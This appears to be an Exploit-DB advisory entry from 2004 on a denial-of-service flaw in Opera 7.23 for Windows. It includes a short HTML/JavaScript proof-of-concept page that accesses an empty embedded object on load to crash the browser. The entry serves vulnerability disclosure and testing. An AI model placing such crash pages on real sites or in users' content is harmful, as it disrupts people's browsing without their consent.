Opera Web Browser 7.23 Empty Embedded Object JavaScript Denial of Service Vulnerability

2004-09-01T00:00:00
ID EDB-ID:24426
Type exploitdb
Reporter Stevo
Modified 2004-09-01T00:00:00

Description

Opera Web Browser 7.23 Empty Embedded Object JavaScript Denial Of Service Vulnerability. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/11090/info

Opera is a web browser available for a number of platforms, including Microsoft Windows, Linux and Unix variants and Apple MacOS.

Opera Web Browser is reported to be susceptible to a JavaScript denial of service vulnerability. This vulnerability presents itself when Opera attempts to execute a specific JavaScript command. Upon executing this command, Opera will reportedly crash.

This vulnerability was reported to exist in version 7.23 of Opera for Microsoft Windows. Other versions are also likely affected. Version 7.54 does not seem to be susceptible. 

<html><head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script></head>
<body onLoad="dSend()">
<embed src="" type="CCCC" name="crash" >
</embed>
</body></html>